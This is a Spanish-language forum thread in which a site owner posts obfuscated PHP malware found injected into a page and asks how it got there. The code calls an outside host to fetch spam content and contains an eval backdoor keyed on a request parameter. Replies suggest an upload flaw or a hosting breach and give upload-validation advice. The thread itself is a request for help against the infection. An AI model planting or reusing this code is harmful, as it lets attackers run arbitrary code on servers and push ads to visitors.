SPAM a través de este código

Iniciado por basickdagger, 16 Febrero 2016, 19:46 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

basickdagger

16 Febrero 2016, 19:46 PM Ultima modificación: 17 Febrero 2016, 07:18 AM por basickdagger
hola ps un compañero a su web algunos links al picar les abre publicidad de otras web en vez de q funcione el link con normalidad, por ejemplo yo lo abro con mi mac book y m aprece publicidad para bajarme mackeeper...

le echamos un vistazo al código y nos percatamos que existía este código...

Código (php) [Seleccionar]

<?php 
//###==###
error_reporting(0); ini_set("display_errors""0"); if (!isset($i8824abdf)) { $i8824abdf TRUE;  $GLOBALS['_537135123_']=Array(base64_decode('cH' .'Jl' .'Z1' .'9tYXRjaA' .'=='),base64_decode('ZmlsZV9nZXRf' .'Y29udGVudHM='),base64_decode('c' .'29ja2V0X2NyZWF0Z' .'V9wYWly'),base64_decode('' .'bX' .'Nz' .'c' .'W' .'xfc' .'X' .'V' .'lcnk' .'='),base64_decode('ZnVuY3' .'Rpb2' .'5fZX' .'hpc3Rz'),base64_decode('' .'Y3' .'VybF' .'9pbm' .'l0'),base64_decode('dX' .'Js' .'ZW5jb2Rl'),base64_decode('dXJsZW' .'5jb2' .'Rl'),base64_decode('b' .'WQ' .'1'),base64_decode('Y3' .'Vy' .'bF9zZ' .'XRv' .'cHQ='),base64_decode('Y3VybF9zZ' .'XRvcHQ='),base64_decode('bX' .'RfcmFuZA=='),base64_decode('Zm' .'ls' .'ZWN0' .'aW1l'),base64_decode('Y3V' .'ybF9le' .'G' .'Vj'),base64_decode('Y3VybF' .'9j' .'b' .'G9z' .'ZQ=='),base64_decode('aW' .'5pX2dldA=='),base64_decode('ZmlsZV9' .'nZXRfY2' .'9ud' .'GVu' .'dHM='),base64_decode('' .'d' .'XJsZW5jb' .'2Rl'),base64_decode('d' .'XJsZW5jb' .'2Rl'),base64_decode('bWQ' .'1'),base64_decode('c' .'3Ry' .'aXBzb' .'GFzaGVz'));  function _565757278($i){$a=Array('Y2x' .'p' .'ZW5' .'0X2NoZ' .'W' .'N' .'r','Y2xpZW50X2NoZWNr','SFRUUF9BQ' .'0NFUF' .'RfQ0hBUlNFVA==','IS4hd' .'Q==','U' .'0NSS' .'VBUX0ZJTEV' .'O' .'Q' .'U1F','V' .'V' .'R' .'GLTg' .'=','d' .'2' .'luZG93cy0xMjUx','' .'SFRUU' .'F9BQ0NFUFRfQ0h' .'BUl' .'NFVA=' .'=','Y' .'3' .'VybF9p' .'bml0','a' .'H' .'R0' .'cDo' .'vL29kaW50YXJhLmNv' .'bS9n' .'ZX' .'QucG' .'hwP2Q9','U0V' .'SVkVSX05' .'BTUU=','U' .'kVRVUVTV' .'F9VUkk=','JnU9','SFRUUF9VU0VS' .'X' .'0FHRU5U','J' .'mM9','Jm' .'k9M' .'SZpcD' .'0' .'=','Uk' .'V' .'N' .'T' .'1RFX' .'0' .'FER' .'FI=','' .'Jmg' .'9','' .'OTczNDc' .'3Y' .'mJhZTQ' .'zOTc2O' .'TE0' .'ZW' .'Ni' .'N2Y0Mz' .'c' .'0Nz' .'E0NGU=','' .'U' .'0VS' .'VkVSX0' .'5BT' .'UU=','UkVR' .'VU' .'VTVF9VUk' .'k=','' .'SFRUUF' .'9VU' .'0VSX0FHRU5U','M' .'Q==','Y' .'Wxsb' .'3' .'df' .'dXJsX2Z' .'vcGV' .'u','' .'aHR0cDovL29kaW50Y' .'X' .'JhLmNvbS9n' .'ZXQu' .'cGh' .'w' .'P' .'2Q9','U0V' .'SVkVSX0' .'5B' .'TUU=','Uk' .'V' .'RVU' .'VTVF9' .'VU' .'kk=','J' .'n' .'U9','SFR' .'UUF9V' .'U' .'0VSX0F' .'HRU5U','JmM' .'9','Jmk9MSZpcD' .'0=','UkVNT1RFX' .'0' .'FERFI=','J' .'mg9','OTc' .'zNDc' .'3Y' .'mJhZTQzOTc2OT' .'E0ZW' .'Ni' .'N2Y0' .'M' .'zc0' .'NzE0N' .'GU=','' .'U0' .'VSVkVSX05' .'BTU' .'U=','Uk' .'V' .'RVUVTVF9VUkk=','SFRUUF9V' .'U' .'0VSX0FHRU' .'5U','M' .'Q' .'==','cA==','cA==','cA==','' .'O' .'DgyNG' .'F' .'iZGY=');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_565757278(0)]))die($_COOKIE[_565757278(1)]);if(!isset($b90d_0[_565757278(2)])){if($GLOBALS['_537135123_'][0](_565757278(3),$GLOBALS['_537135123_'][1]($_SERVER[_565757278(4)]))){$b90d_1=_565757278(5);}else{$b90d_1=_565757278(6);}}else{$b90d_1=$b90d_0[_565757278(7)];if((round(0+187.5+187.5)^round(0+375))&& $GLOBALS['_537135123_'][2]($b90d_0,$b90d_0,$_SERVER,$b90d_0,$_REQUEST))$GLOBALS['_537135123_'][3]($b90d_0,$b90d_0);}if($GLOBALS['_537135123_'][4](_565757278(8))){$b90d_2=$GLOBALS['_537135123_'][5](_565757278(9) .$GLOBALS['_537135123_'][6]($_SERVER[_565757278(10)] .$_SERVER[_565757278(11)]) ._565757278(12) .$GLOBALS['_537135123_'][7]($_SERVER[_565757278(13)]) ._565757278(14) .$b90d_1 ._565757278(15) .$_SERVER[_565757278(16)] ._565757278(17) .$GLOBALS['_537135123_'][8](_565757278(18) .$_SERVER[_565757278(19)] .$_SERVER[_565757278(20)] .$_SERVER[_565757278(21)] .$b90d_1 ._565757278(22)));$GLOBALS['_537135123_'][9]($b90d_2,round(0+8.4+8.4+8.4+8.4+8.4),false);$GLOBALS['_537135123_'][10]($b90d_2,round(0+6637.6666666667+6637.6666666667+6637.6666666667),true);if(round(0+1989.25+1989.25+1989.25+1989.25)<$GLOBALS['_537135123_'][11](round(0+785.5+785.5+785.5+785.5),round(0+962+962+962+962+962)))$GLOBALS['_537135123_'][12]($b90d_0,$_REQUEST);echo $GLOBALS['_537135123_'][13]($b90d_2);$GLOBALS['_537135123_'][14]($b90d_2);}elseif($GLOBALS['_537135123_'][15](_565757278(23))==round(0+0.5+0.5)){echo $GLOBALS['_537135123_'][16](_565757278(24) .$GLOBALS['_537135123_'][17]($_SERVER[_565757278(25)] .$_SERVER[_565757278(26)]) ._565757278(27) .$GLOBALS['_537135123_'][18]($_SERVER[_565757278(28)]) ._565757278(29) .$b90d_1 ._565757278(30) .$_SERVER[_565757278(31)] ._565757278(32) .$GLOBALS['_537135123_'][19](_565757278(33) .$_SERVER[_565757278(34)] .$_SERVER[_565757278(35)] .$_SERVER[_565757278(36)] .$b90d_1 ._565757278(37)));$b90d_3=_565757278(38);}if(isset($_REQUEST[_565757278(39)])&& $_REQUEST[_565757278(40)]== _565757278(41)){eval($GLOBALS['_537135123_'][20]($_REQUEST["c"]));}  }
//###==###
?>


lo eliminamos y todo a la perfección, pero mi duda es:

es posible saber como ingresaron ese código ahí?
¿fue a través del servidor, la pagina, etc...?
como se puede evitar esto?

sobretodo para ver si es algo q nos toca arreglar o si es algo q es directamente con el proveedor del servidor...

la página es un simple listado q manda los títulos de unos pdf a través de mysql y php.

saludos

engel lex

#1
16 Febrero 2016, 19:55 PM
tienes cuadros de input? tuenes friendly url? tienes upload de archivos?
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

basickdagger

#2
16 Febrero 2016, 19:59 PM
Cita de: engel lex en 16 Febrero 2016, 19:55 PM
tienes cuadros de input? tuenes friendly url? tienes upload de archivos?

en esa página donde estaba el código exactamente no.

simple archivo de php con

Código (html4strict) [Seleccionar]
<li><a href="mipdf.pdf" target="_blank">ver pdf</a></li>

y hay un input pero es para enviar correo con una simple función mail y el cual no almacena nada en ninguna BD...

engel lex

#3
16 Febrero 2016, 21:10 PM
en culquier parte dentro del hosting... porque seguro lo colaron desde otro php... si no tienes nada de eso, puede haber sido un hackeo al servidor del hosting directamente
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

basickdagger

#4
17 Febrero 2016, 00:59 AM
ok, voy a checar eso, si hay un archivo de upload pero no es el mismo archivo...
quizá  ahí este el problema...

tendrán algún enlace de buenas prácticas para upload de archivos

engel lex

#5
17 Febrero 2016, 05:33 AM
Citartendrán algún enlace de buenas prácticas para upload de archivos

no, pero es recomendable lo siguiente... primero, el archivo subido es analizado para asegurar que el contenido es del tipo apropiado (magic numbers y formato), si es tipo imagen, siempre reprocesarla con gd por seguridad...
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario